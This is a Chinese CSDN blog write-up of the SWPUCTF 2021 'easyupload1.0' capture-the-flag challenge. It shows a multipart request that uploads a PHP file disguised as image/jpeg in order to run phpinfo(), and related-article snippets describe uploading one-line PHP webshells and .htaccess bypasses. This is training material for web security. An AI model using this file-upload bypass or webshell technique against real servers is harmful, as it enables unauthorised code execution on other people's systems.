【CTF】[SWPUCTF 2021 新生赛]easyupload1.0

最新推荐文章于 2024-07-06 18:45:53 发布
最新推荐文章于 2024-07-06 18:45:53 发布
阅读量592 收藏
点赞数
分类专栏: # CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47055136/article/details/131300464
版权
文章描述了一场名为SWPUCTF2021的新生网络安全竞赛中的一个挑战,挑战涉及到一个名为easyupload1.0的组件,允许通过伪装成JPEG图像的PHP文件(sqzr.php)进行上传。一旦文件上传成功,通过访问该文件可以触发phpinfo()函数,揭示系统信息,最终找到并获取了flag。
摘要由CSDN通过智能技术生成

[SWPUCTF 2021 新生赛]easyupload1.0

play

------WebKitFormBoundaryapNeGi5wAZSsoYKH
Content-Disposition: form-data; name="uploaded"; filename="sqzr.php"
Content-Type: image/jpeg

<?php 
phpinfo();
?>

响应

<meta charset="utf-8">./upload/sqzr.php succesfully uploaded!

直接访问,获得flag

知识点

  • Content-Type: image/jpeg
西原一点红
关注
专栏目录
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 682
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 851
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
ctf (easyupload1.0)
Glacier_Mount的博客
06-29 1140
简单的文件上传题
[SWPUCTF 2021 新生]easyupload1.0
wyxlsm的博客
02-26 1958
搜到flag文件 这边我环境关了 就直接说 蚁剑不会用的自行百度 和下载 上传我们发现flag值不对 这是虚拟flag值 然后 我们在。首先你得知道我们的目的是什么 取值flag。这是没有显示的 这里分web的前端和后端 而我们这个一句后端注入 不会显示 我们用蚁剑去连一下。这里我们可以看到这个函数 eval 这个函数是执行括号的语句的 php语句的。把1.jpg换成1.php 因为我们上传php去注入 这边是去识别 得到。这个是我们修改成功 得到的 我们可以去访问这upload/1.php。
[SWPUCTF 2021 新生]easyupload1.0(一句话木马+蚁剑+.htaccess)
2401_84499442的博客
07-06 288
搞笑的是,直接上传成功了,那这一题就是非常简单的入门题了,然后再用蚁剑连接,直接得到flag。哈哈,那算了吧,看来这条路行不通,那这一题就是简单地修改文件后缀即可绕过。首先,关注题目标签,试着上传一句话木马1.php,密码为a。先上传.htaccess文件,修改jpg文件为可执行文件。那咱们再试试修改配置文件能不能写这一题。
NSSCTF | [SWPUCTF 2021 新生]easyupload1.0
2302_80946742的博客
05-19 416
但是这里蚁剑连接后得到的flag是假的,没办法了,只能看看phpinfo里面有没有。使用同样的绕过方式,传入phpinfo.php文件,然后访问。可以看到GIF89a,说明一句话木马已经上传成功了,并且被服务器成功解析执行。接下来我们就可以使用HackBar进行命令执行。可以看到ls命令是有作用的。将ContentType修改为image/jpeg即可成功上传。可以看到右边回显了文件上传成功的路径,我们去访问试试看。直接传一句话木马显然是行不通的。果然,能够搜索到flag。
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 2856
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
[SWPUCTF 2021 新生]
snowlyzz的博客
09-11 1527
。。
[SWPUCTF 2021 新生]web 解题思路,实操解析,解题软件,解题方法
最新发布
09-06
关于sql注入
NSSCTF刷题笔记web11——[SWPUCTF 2021 新生]easyupload1.0
qq_45692883的博客
01-18 558
修改png后缀为php发现可以上传。直接在内容中写入一句话木马即可。这个用burp抓包会方便很多。访问路径,执行命令即可。
[SWPUCTF] 2021-easyupload1.0(WP)
wikey 的博客
03-28 243
我们可以在burp里面直接改Content-Type为image/jpeg(图片样式)贱了,flag居然不在这里,我们用系统目录命令env查找一下环境变量。这样就上传成功了,然后将我们的木马写进去之后就可以连蚁剑了。看样子是需要我们上传一个文件,先尝试了放入pdf。放入我们自定义的php文件之后用burp拦截一下。连好了,基本做出来了。
[SWPUCTF 2021 新生]hardrce
07-25
\[SWPUCTF 2021 新生\]hardrce是一个比中的题目,它是一个PHP脚本。这个脚本首先会检查用户传入的参数wllm是否存在,然后会对wllm进行一系列的过滤操作。过滤操作包括去除空格、制表符、回车、换行等特殊字符,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值